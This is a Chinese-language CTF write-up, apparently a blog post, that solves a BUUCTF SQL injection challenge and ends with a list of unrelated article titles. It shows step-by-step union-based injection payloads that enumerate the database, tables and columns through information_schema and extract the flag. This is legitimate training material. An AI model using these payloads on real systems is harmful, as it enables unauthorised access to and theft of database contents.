前面的题目都不太难,就直接从SQL注入开始了。

这个样子的话,明显就是注入,我们先拿出SQL语句:http://fb415201-6634-4fc3-a6bc-a67b84ea1ed2.node3.buuoj.cn/index.php?id=1

1‘报错
1' or 1=1 --+ 正常,Ok随后order by 到3没问题 4就报错

注:没显示什么就是报错了。

order by主要是用来查看这个注入点网页显示多少字段,比如order by9不报错,order by10报错,那么这个网页就有9个字段,最后手动爆库的时候,union select 1,2,3,4,5,7,8,9

接下来我们开始查库查表查字段

  查库名
  payload:?id=-1' union select 1,database(),3 --+
  回显说数据库名就是 note

查表名

?id=-1' union select 1,database(),table_name from information_schema.tables where table_schema='note' limit 0,1 --+

?id=-1' union select 1,database(),table_name from information_schema.tables where table_schema='note' limit 1,1 --+

相比之下 fl4g更可疑一些,先查一下它的字段
  payload:?id=-1' union select 1,database(), group_concat(column_name) from information_schema.columns where table_name='fl4g' --+
  成功得到列名

查询字段
  payload:?id=-1' union select 1,database(), group_concat(fllllag) from fl4g --+
  得到flag了!

最新文章

  1. 微软新神器-Power BI横空出世,一个简单易用,还用得起的BI产品,你还在等什么???
  2. 高可用Hadoop平台-Flume NG实战图解篇
  3. 菜鸟学Linux命令:tar命令 压缩与解压缩
  4. 【读书笔记】iOS-GCD-block
  5. Ubuntu 创建快捷方式的方法
  6. qml+opencv(二),实现人脸检测
  7. Android中View绘制优化之三---- 优化View
  8. iOS中的定时器
  9. [算法专题] stack
  10. Oracle的字符连接函数 concat 和 || 的区别
  11. Getting started with Processing 第六章总结
  12. PHP+Oracle Instant Client
  13. 55. Jump Game(贪心)
  14. Halcon开发环境和数据结构介绍——第1讲
  15. SLAM FOR DUMMIES 第5-8章 中文翻译
  16. win10系统的快捷键
  17. cmd编译java程序出现:找不到或无法加载主类的原因以及解决办法 以及 给java的main方法传递args参数
  18. MyBatis初识(通过小实例清晰认识MyBatis)
  19. 不可逆转(SDOI2010地精部落)
  20. PAT A1127 ZigZagging on a Tree (30 分)

热门文章

  1. JAVA WEB 用servlet实现分页,思路比较清晰和简单。
  2. servlet核心技术2
  3. RabbitMQ 安装与界面管理
  4. C语言:int -32768-32767
  5. python使用selenium,webdriver自动下载百度网盘内容
  6. 团队开发day03
  7. 【转载】SpringMVC学习笔记
  8. Requests方法 -- Blog流程类进行关联
  9. 微信小程序云开发-数据条件查询
  10. 【codeforces1058】Vasya and Golden Ticket 枚举+暴力+模拟